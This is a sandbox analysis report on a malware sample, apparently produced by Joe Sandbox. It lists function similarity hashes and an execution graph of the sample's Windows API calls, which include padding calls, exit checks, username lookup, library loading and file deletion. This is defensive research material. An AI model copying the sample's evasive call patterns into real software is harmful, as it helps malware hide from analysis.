                                                                Similarity
                                                                • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                                                                • String ID:
                                                                • API String ID: 510365852-3916222277
                                                                • Opcode ID: 544e4b07dd674267a33590d581e7d7f6fbc5772c5dbd4b931e7b2a6a98303144
                                                                • Instruction ID: 715f135e04706e2d7d02d77c6d77304ec27d23994e94d20a8d7d50633ab737d1
                                                                • Opcode Fuzzy Hash: 544e4b07dd674267a33590d581e7d7f6fbc5772c5dbd4b931e7b2a6a98303144
                                                                • Instruction Fuzzy Hash: 41115E72A08B818AE764EF25B84119AF3A0FB457B4F540339E6BD4B7D6CF38D5428B44
                                                                Function 00007FF708E472A0 Relevance: 9.1, APIs: 6, Instructions: 135COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: AcquireCriticalLeaveLockSection
                                                                • String ID:
                                                                • API String ID: 1584331419-0
                                                                • Opcode ID: 8a21c391f2fa8f6760bb0518daba15789efd43beed81140494227ceabfb2c7c7
                                                                • Instruction ID: 288fc782ce0dea9f9af7483462491de825cf83b4ea6fdf7fd34d0bbd3066700a
                                                                • Opcode Fuzzy Hash: 8a21c391f2fa8f6760bb0518daba15789efd43beed81140494227ceabfb2c7c7
                                                                • Instruction Fuzzy Hash: 88614AA1E08A9B81FA10BF25EC403B9F3A4BF45790F980535D98C527A5DF7CE085C768
                                                                Function 00007FF708E425D0 Relevance: 9.1, APIs: 6, Instructions: 114COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: AcquireCriticalLeaveLockSection
                                                                • String ID:
                                                                • API String ID: 1584331419-0
                                                                • Opcode ID: 274865066b5fba10fdc33392f00d02dfd79c1417a7670fe989a84b8c2bb43ba0
                                                                • Instruction ID: 65a35a2fa1f487a2a1aec7e3a334a17a48650bab85c7f06e535b7a43a89bd4d9
                                                                • Opcode Fuzzy Hash: 274865066b5fba10fdc33392f00d02dfd79c1417a7670fe989a84b8c2bb43ba0
                                                                • Instruction Fuzzy Hash: B6512971908A9781FA60BF20EC403B9F3A4FF95790FA81535DA8D427A5DF7CE0558728
                                                                Function 00007FF708E52AA0 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DebugBreak.KERNEL32(?,?,?,?,?,-0000000F,00007FF708E52C71,00000000,?,0000027E352904E0,00007FF708E52192), ref: 00007FF708E52B49
                                                                • DebugBreak.KERNEL32(?,?,?,?,?,-0000000F,00007FF708E52C71,00000000,?,0000027E352904E0,00007FF708E52192), ref: 00007FF708E52B61
                                                                • DebugBreak.KERNEL32(?,?,?,?,?,-0000000F,00007FF708E52C71,00000000,?,0000027E352904E0,00007FF708E52192), ref: 00007FF708E52B79
                                                                • DebugBreak.KERNEL32(?,?,?,?,?,-0000000F,00007FF708E52C71,00000000,?,0000027E352904E0,00007FF708E52192), ref: 00007FF708E52B97
                                                                • DebugBreak.KERNEL32(?,?,?,?,?,-0000000F,00007FF708E52C71,00000000,?,0000027E352904E0,00007FF708E52192), ref: 00007FF708E52BBC
                                                                • DebugBreak.KERNEL32 ref: 00007FF708E52BF0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: BreakDebug
                                                                • String ID:
                                                                • API String ID: 456121617-0
                                                                • Opcode ID: 039b5dd5760cf53f5c50649192f2a66185dc24a391c3f29183f4ffe692697501
                                                                • Instruction ID: 5d4ee635fb499848ffc5dae5cfc17c958ebae144d28139929d38f3a8fe98f607
                                                                • Opcode Fuzzy Hash: 039b5dd5760cf53f5c50649192f2a66185dc24a391c3f29183f4ffe692697501
                                                                • Instruction Fuzzy Hash: 5D418366A0C6C146EBA5BF60984027AE795AF84BD4F880139EF4D17796DF3CE440C768
                                                                Function 00007FF708E13FF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFailFastRaise
                                                                • String ID: Process is terminating due to StackOverflowException.
                                                                • API String ID: 2546344036-2200901744
                                                                • Opcode ID: bea5eb1355a98d7a76a4ae4c8de609e9b6e2298e58a7581bcca3b5d664879000
                                                                • Instruction ID: b7359f055eac5629ac88ec8510312ba84c06b4bc2bc20c02fbbf770823d8b1ad
                                                                • Opcode Fuzzy Hash: bea5eb1355a98d7a76a4ae4c8de609e9b6e2298e58a7581bcca3b5d664879000
                                                                • Instruction Fuzzy Hash: 33519076B09A4281EE54AB15DC503B8E3A1FF59B98F8441B2DA1E477E0DF3CE495832C
                                                                Function 00007FF708E51190 Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: SwitchThread
                                                                • String ID:
                                                                • API String ID: 115865932-0
                                                                • Opcode ID: 771d1eb6a3549db9bd6f3b8e47b532a6de7b1211258de3513a7d339ba5d52707
                                                                • Instruction ID: 78ee0d5ae33c729c4ff9540abb410ca43445d732c77d24c23c194caf6cb7ebad
                                                                • Opcode Fuzzy Hash: 771d1eb6a3549db9bd6f3b8e47b532a6de7b1211258de3513a7d339ba5d52707
                                                                • Instruction Fuzzy Hash: 5141C432B1825681EB54AB26C84133DF290EF44FD4F948336DA0E867C5EF3CE8419768
                                                                Function 00007FF708E32BCA Relevance: 6.1, APIs: 4, Instructions: 109threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: SwitchThread
                                                                • String ID:
                                                                • API String ID: 115865932-0
                                                                • Opcode ID: e4bf8d6ce71edeff9450c0bc95967aad154465df5333f7082db79e79a6077396
                                                                • Instruction ID: fa776a6d26c683625d6a431ad54e79e2f74960a6854cb3a83d67954a5faea986
                                                                • Opcode Fuzzy Hash: e4bf8d6ce71edeff9450c0bc95967aad154465df5333f7082db79e79a6077396
                                                                • Instruction Fuzzy Hash: 9C417D30E0C24386F656BB2ADC56679E2A1AF40B11FD89535E69D823D2DF3CFC419638
                                                                Function 00007FF708E51A70 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DebugBreak.KERNEL32(?,?,?,00007FF708E2F395,?,?,00000001,00007FF708E3D666), ref: 00007FF708E51B49
                                                                • DebugBreak.KERNEL32(?,?,?,00007FF708E2F395,?,?,00000001,00007FF708E3D666), ref: 00007FF708E51B66
                                                                • DebugBreak.KERNEL32(?,?,?,00007FF708E2F395,?,?,00000001,00007FF708E3D666), ref: 00007FF708E51B81
                                                                • DebugBreak.KERNEL32(?,?,?,00007FF708E2F395,?,?,00000001,00007FF708E3D666), ref: 00007FF708E51B9A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: BreakDebug
                                                                • String ID:
                                                                • API String ID: 456121617-0
                                                                • Opcode ID: cc109c2cd14c70697e10635e36856bfda68170eeded427e50872eb2067d3eb48
                                                                • Instruction ID: 1145f8e5081d8054748f1a6bfaf8b56971a3703be5427ab50a966349b0403e6f
                                                                • Opcode Fuzzy Hash: cc109c2cd14c70697e10635e36856bfda68170eeded427e50872eb2067d3eb48
                                                                • Instruction Fuzzy Hash: 6141A421E0D74281EAA1BB519940379F7E5EF44B98F891638DE4D07391EF7CE841C328
                                                                Function 00007FF708E7305C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFileHeaderRaise
                                                                • String ID: csm
                                                                • API String ID: 2573137834-1018135373
                                                                • Opcode ID: a8536f9d8b8a29fcbe7d901e32f626ef711a856b6ff72c352a605791632f069e
                                                                • Instruction ID: 59d6ecec1cf2c926130df5e5a1f665c47b6fd39ec1e0bdd9519e32cf11cef793
                                                                • Opcode Fuzzy Hash: a8536f9d8b8a29fcbe7d901e32f626ef711a856b6ff72c352a605791632f069e
                                                                • Instruction Fuzzy Hash: 70112832618B8182EB619B25E840269F7E5FF88B94F984235EB8D07B58DF3DD551CB04

                                                                Execution Graph

                                                                Execution Coverage:63.8%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:94.7%
                                                                Total number of Nodes:645
                                                                Total number of Limit Nodes:5
                                                                execution_graph 4088 409adc 6 API calls 4089 409b41 16 API calls 4088->4089 4090 409b3a CancelWaitableTimer 4088->4090 4091 409c16 CancelWaitableTimer 4089->4091 4092 409c1f GetLastError 4089->4092 4090->4089 4093 409c25 CreateSemaphoreA ReleaseSemaphore 4091->4093 4092->4093 4094 409c42 OutputDebugStringA 4093->4094 4302 401000 LoadLibraryA 4094->4302 4098 409c6b OutputDebugStringA 4098->4098 4099 409c77 CreateWaitableTimerA OutputDebugStringA 4098->4099 4100 409ca1 CreateMutexA 4099->4100 4101 409c9a CancelWaitableTimer 4099->4101 4102 409cd0 OutputDebugStringA 4100->4102 4103 409cb8 SetEnvironmentVariableA ReleaseMutex 4100->4103 4101->4100 4104 409cd7 CreateSemaphoreA ReleaseSemaphore SetEnvironmentVariableA CreateSemaphoreA ReleaseSemaphore 4102->4104 4103->4104 4105 409d26 CreateWaitableTimerA 4104->4105 4106 409d1f OutputDebugStringA 4104->4106 4305 40ded0 CreateSemaphoreA OutputDebugStringA ReleaseSemaphore 4105->4305 4106->4105 4109 409d41 4315 40ed79 4109->4315 4110 409d3a ExitProcess 4112 409d4b CreateWaitableTimerA CancelWaitableTimer SetEnvironmentVariableA CreateSemaphoreA ReleaseSemaphore 4113 409d8d 6 API calls 4112->4113 4115 409dcf SetEnvironmentVariableA 4113->4115 4115->4115 4116 409de0 CreateWaitableTimerA GetLastError 4115->4116 4117 409e04 CancelWaitableTimer 4116->4117 4118 409e0b 4116->4118 4117->4118 4329 404b50 12 API calls 4118->4329 4123 409e19 4734 40e38d 4123->4734 4124 409e1e CreateMutexA 4126 409e31 ReleaseMutex SetEnvironmentVariableA 4124->4126 4127 409e46 GetLastError 4124->4127 4128 409e48 14 API calls 4126->4128 4127->4128 4129 409f11 CreateWaitableTimerA CancelWaitableTimer RegOpenKeyExA 4128->4129 4130 409f0a CancelWaitableTimer 4128->4130 4716 40dc49 13 API calls 4129->4716 4130->4129 4133 409f92 CancelWaitableTimer 4135 409fa7 10 API calls 4133->4135 4134 409f9b SetEnvironmentVariableA 4134->4135 4136 40a052 OutputDebugStringA 4135->4136 4137 40a034 RegOpenKeyExA 4135->4137 4138 40a059 4136->4138 4137->4138 4139 40dc49 31 API calls 4138->4139 4140 40a064 FindFirstFileA FindClose CreateSemaphoreA ReleaseSemaphore 4139->4140 4141 40a0ad OutputDebugStringA 4140->4141 4142 40a09f SetEnvironmentVariableA 4140->4142 4143 40a0b4 11 API calls 4141->4143 4142->4143 4144 40a142 RegOpenKeyExA GetLastError 4143->4144 4145 40a139 ReleaseMutex 4143->4145 4146 40a164 4144->4146 4145->4146 4147 40dc49 31 API calls 4146->4147 4148 40a16f CreateFileMappingW FindCloseChangeNotification OutputDebugStringA CreateMutexA 4147->4148 4149 40a1b0 11 API calls 4148->4149 4150 40a1a9 ReleaseMutex 4148->4150 4151 40a264 CreateEventA SetEvent ResetEvent CreateWaitableTimerA 4149->4151 4152 40a248 RegOpenKeyExA 4149->4152 4150->4149 4153 40dc49 31 API calls 4151->4153 4152->4151 4154 40a2a0 13 API calls 4153->4154 4155 40a338 GetLastError 4154->4155 4156 40a33e FindFirstFileA FindClose CreateWaitableTimerA 4154->4156 4155->4156 4157 40a376 OutputDebugStringA 4156->4157 4158 40a36d CancelWaitableTimer 4156->4158 4159 40a37d CreateWaitableTimerA SetEnvironmentVariableA CancelWaitableTimer CreateSemaphoreA ReleaseSemaphore 4157->4159 4158->4159 4160 40dc49 31 API calls 4159->4160 4161 40a3c8 CreateSemaphoreA ReleaseSemaphore CreateSemaphoreA OutputDebugStringA ReleaseSemaphore 4160->4161 4162 40a414 RegOpenKeyExA 4161->4162 4163 40a40c GetLastError 4161->4163 4164 40a42f CreateWaitableTimerA GetLastError 4162->4164 4163->4164 4165 40a449 CancelWaitableTimer 4164->4165 4166 40a44c CreateEventA SetEvent ResetEvent 4164->4166 4165->4166 4727 40bc7d LocalAlloc 4166->4727 4168 40a4b6 4169 40f4f1 39 API calls 4168->4169 4170 40a4e3 4169->4170 4171 40f75c GetUserNameW 4170->4171 4172 40a4ea 4171->4172 4173 40f012 41 API calls 4172->4173 4174 40a504 4173->4174 4175 40f012 41 API calls 4174->4175 4176 40a511 4175->4176 4177 40f012 41 API calls 4176->4177 4178 40a51a 4177->4178 4179 40f012 41 API calls 4178->4179 4180 40a527 4179->4180 4181 40f012 41 API calls 4180->4181 4182 40a532 LocalFree 4181->4182 4187 40a55b 4182->4187 4184 40ed79 47 API calls 4184->4187 4185 40f012 41 API calls 4185->4187 4186 40af5d 49 API calls 4188 40a5b8 6 API calls 4186->4188 4187->4184 4187->4185 4187->4186 4194 40a6b8 LocalFree 4187->4194 4195 40a68f LocalFree 4187->4195 4197 40a6b6 4187->4197 4189 40a622 CancelWaitableTimer 4188->4189 4190 40a62b SetEnvironmentVariableA 4188->4190 4191 40a637 CreateSemaphoreA ReleaseSemaphore 4189->4191 4190->4191 4192 40a675 GetLastError 4191->4192 4193 40a657 RegOpenKeyExA 4191->4193 4192->4187 4193->4187 4199 40a6d1 LocalFree LocalFree 4194->4199 4195->4187 4196 40a69c LocalFree 4195->4196 4196->4187 4197->4199 4200 40a6f3 4199->4200 4201 40e48d 104 API calls 4200->4201 4202 40a700 4201->4202 4203 40af42 LocalFree LocalFree 4202->4203 4204 40a70b CreateSemaphoreA ReleaseSemaphore 4202->4204 4205 40a735 13 API calls 4204->4205 4207 40a7d1 SetEnvironmentVariableA 4205->4207 4207->4207 4208 40a7e2 CreateWaitableTimerA 4207->4208 4209 40a7f6 CancelWaitableTimer 4208->4209 4210 40a7ff OutputDebugStringA 4208->4210 4211 40a806 4209->4211 4210->4211 4212 40bcbf 94 API calls 4211->4212 4213 40a815 4212->4213 4214 40a836 ExitProcess 4213->4214 4215 40a82c 4213->4215 4216 40eb7b 25 API calls 4215->4216 4217 40a86c 4216->4217 4218 40a872 ExitProcess 4217->4218 4219 40a87a 4217->4219 4220 40f012 41 API calls 4219->4220 4221 40a887 LocalFree 4220->4221 4222 40a8a4 4221->4222 4223 40f012 41 API calls 4222->4223 4224 40a8be 4223->4224 4225 40f012 41 API calls 4224->4225 4226 40a8cb 4225->4226 4227 40f012 41 API calls 4226->4227 4228 40a8f4 4227->4228 4229 40f012 41 API calls 4228->4229 4230 40a901 SetCurrentDirectoryW 4229->4230 4231 40a91e GetEnvironmentVariableW 4230->4231 4232 40f012 41 API calls 4231->4232 4233 40a93f 4232->4233 4234 40f012 41 API calls 4233->4234 4235 40a94a SetEnvironmentVariableW LocalFree 4234->4235 4236 40d5e0 280 API calls 4235->4236 4237 40a96e LoadLibraryW 4236->4237 4238 40a985 10 API calls 4237->4238 4239 40acff LoadLibraryW 4237->4239 4242 40aa24 CreateMutexA 4238->4242 4243 40aa09 RegOpenKeyExA 4238->4243 4240 40ad61 4239->4240 4241 40ad12 SHGetSpecialFolderPathW 4239->4241 4244 40ffe8 435 API calls 4240->4244 4253 4083ae GetProcAddress 4241->4253 4245 40aa35 ReleaseMutex 4242->4245 4246 40aa3c CreateFileMappingW CloseHandle SetEnvironmentVariableA CreateWaitableTimerA GetLastError 4242->4246 4243->4242 4249 40ad6c 4244->4249 4245->4246 4247 40aa83 CancelWaitableTimer SetEnvironmentVariableA 4246->4247 4248 40aa98 GetLastError 4246->4248 4251 40aa9e 4247->4251 4248->4251 4252 4103e1 414 API calls 4249->4252 4254 404a1f 93 API calls 4251->4254 4255 40ad77 4252->4255 4256 40ad3b 4253->4256 4257 40aaa7 CreateMutexA 4254->4257 4258 40739f 467 API calls 4255->4258 4259 40ad57 LocalFree 4256->4259 4263 408109 423 API calls 4256->4263 4260 40aac3 OutputDebugStringA GetLastError 4257->4260 4261 40aaba ReleaseMutex 4257->4261 4262 40ad82 4258->4262 4259->4240 4264 40aad0 CreateWaitableTimerA 4260->4264 4261->4264 4265 40c6fe 429 API calls 4262->4265 4266 40ad54 4263->4266 4267 40aae6 16 API calls 4264->4267 4268 40aadf CancelWaitableTimer 4264->4268 4269 40ad8c 4265->4269 4266->4259 4271 40abd2 OutputDebugStringA 4267->4271 4272 40abc4 SetEnvironmentVariableA 4267->4272 4268->4267 4270 40d8aa 429 API calls 4269->4270 4273 40ad97 4270->4273 4274 40abd9 4271->4274 4272->4274 4275 406d6e 429 API calls 4273->4275 4276 404994 608 API calls 4274->4276 4277 40ada2 LocalAlloc 4275->4277 4278 40abea 6 API calls 4276->4278 4284 40c0bd 27 API calls 4277->4284 4279 40ac51 FindFirstFileA FindClose CreateSemaphoreA ReleaseSemaphore 4278->4279 4280 40ac4e CancelWaitableTimer 4278->4280 4281 40aca5 CreateEventA SetEvent ResetEvent CreateMutexA 4279->4281 4282 40ac8a RegOpenKeyExA 4279->4282 4280->4279 4285 40acf5 GetLastError 4281->4285 4286 40acd9 OutputDebugStringA ReleaseMutex SetEnvironmentVariableA 4281->4286 4282->4281 4287 40adcc 4284->4287 4288 40acfb 4285->4288 4286->4288 4289 40addd 13 API calls 4287->4289 4290 40c15a 355 API calls 4287->4290 4288->4239 4291 40aeb2 SetEnvironmentVariableA 4289->4291 4292 40ae98 OutputDebugStringA ReleaseMutex OutputDebugStringA 4289->4292 4290->4289 4293 40aebe FindFirstFileA FindClose CreateWaitableTimerA 4291->4293 4292->4293 4294 40aeeb CancelWaitableTimer 4293->4294 4295 40aeee 4293->4295 4294->4295 4296 40973e 98 API calls 4295->4296 4297 40aef9 4296->4297 4298 40af01 FreeLibrary 4297->4298 4299 40af08 DeleteFileW LocalFree 4297->4299 4298->4299 4300 40af22 FreeLibrary 4299->4300 4301 40af29 DeleteFileW LocalFree LocalFree 4299->4301 4300->4301 4301->4203 4303 401022 111 API calls 4302->4303 4304 40101a LocalAlloc LocalFree 4302->4304 4303->4304 4304->4098 4306 40df25 OutputDebugStringA 4305->4306 4307 40df0c RegOpenKeyExA 4305->4307 4308 40df2c CreateEventA SetEvent ResetEvent CreateWaitableTimerA RegOpenKeyExA 4306->4308 4307->4308 4309 40df84 OutputDebugStringA 4308->4309 4310 40df7f CancelWaitableTimer 4308->4310 4311 40df8b 7 API calls 4309->4311 4310->4311 4312 40dfdf 4311->4312 4313 409d36 4312->4313 4314 40dfe3 CreateMutexW 4312->4314 4313->4109 4313->4110 4314->4313 4316 40ed90 CreateWaitableTimerA CancelWaitableTimer CreateMutexA 4315->4316 4317 40edf1 OutputDebugStringA OutputDebugStringA 4316->4317 4318 40edc9 OutputDebugStringA ReleaseMutex RegOpenKeyExA 4316->4318 4319 40ee01 CreateSemaphoreA ReleaseSemaphore 4317->4319 4318->4319 4320 40ee34 10 API calls 4319->4320 4321 40ee1e RegOpenKeyExA 4319->4321 4322 40eec3 4320->4322 4323 40eeb5 CancelWaitableTimer 4320->4323 4321->4320 4324 40eec8 9 API calls 4322->4324 4323->4324 4325 40ef62 8 API calls 4324->4325 4326 40ef44 CancelWaitableTimer RegOpenKeyExA 4324->4326 4327 40efbb OutputDebugStringA 4325->4327 4326->4325 4327->4327 4328 40efc7 LocalAlloc SetEnvironmentVariableA LocalFree OutputDebugStringA SetEnvironmentVariableA 4327->4328 4328->4112 4330 404c35 ReleaseMutex 4329->4330 4331 404c3e RegOpenKeyExA 4329->4331 4332 404c59 CreateSemaphoreA ReleaseSemaphore 4330->4332 4331->4332 4333 404c81 17 API calls 4332->4333 4334 404c7b GetLastError 4332->4334 4335 404d83 OutputDebugStringA 4333->4335 4336 404d8c SetEnvironmentVariableA 4333->4336 4334->4333 4337 404d9c CreateWaitableTimerA SetEnvironmentVariableA 4335->4337 4336->4337 4338 404dd0 CancelWaitableTimer 4337->4338 4339 404dd7 18 API calls 4337->4339 4338->4339 4340 404ef6 CancelWaitableTimer 4339->4340 4341 404efd FindFirstFileA FindClose CreateMutexA 4339->4341 4340->4341 4342 404f44 CreateFileMappingW CloseHandle OutputDebugStringA 4341->4342 4343 404f3d ReleaseMutex 4341->4343 4344 404f7d OutputDebugStringA 4342->4344 4343->4342 4344->4344 4345 404f89 CreateWaitableTimerA CancelWaitableTimer CreateMutexA CreateWaitableTimerA 4344->4345 4346 404fe6 8 API calls 4345->4346 4347 404fcf CancelWaitableTimer SetEnvironmentVariableA 4345->4347 4348 405074 CancelWaitableTimer 4346->4348 4349 405079 GetLastError 4346->4349 4347->4346 4350 40507f 11 API calls 4348->4350 4349->4350 4351 405184 RegOpenKeyExA 4350->4351 4352 40516c GetLastError ReleaseMutex OutputDebugStringA 4350->4352 4353 40519f CreateWaitableTimerA 4351->4353 4352->4353 4354 4051c5 SetEnvironmentVariableA 4353->4354 4355 4051bc CancelWaitableTimer 4353->4355 4356 4051d5 CreateSemaphoreA ReleaseSemaphore 4354->4356 4355->4356 4357 405212 14 API calls 4356->4357 4358 4051f7 RegOpenKeyExA 4356->4358 4359 405318 FindFirstFileA FindClose CreateMutexA 4357->4359 4360 4052fe RegOpenKeyExA 4357->4360 4358->4357 4361 405360 ReleaseMutex 4359->4361 4362 40536e RegOpenKeyExA 4359->4362 4360->4359 4363 40538d 8 API calls 4361->4363 4362->4363 4364 405445 CreateWaitableTimerA OutputDebugStringA 4363->4364 4365 405427 OutputDebugStringA ReleaseMutex SetEnvironmentVariableA 4363->4365 4366 405472 7 API calls 4364->4366 4367 40546b CancelWaitableTimer 4364->4367 4365->4364 4368 4054f1 ReleaseMutex 4366->4368 4369 4054f8 10 API calls 4366->4369 4367->4366 4368->4369 4370 4055c6 ReleaseMutex 4369->4370 4371 4055cf OutputDebugStringA SetEnvironmentVariableA 4369->4371 4372 4055e6 6 API calls 4370->4372 4371->4372 4373 405675 GetLastError 4372->4373 4374 405658 RegOpenKeyExA 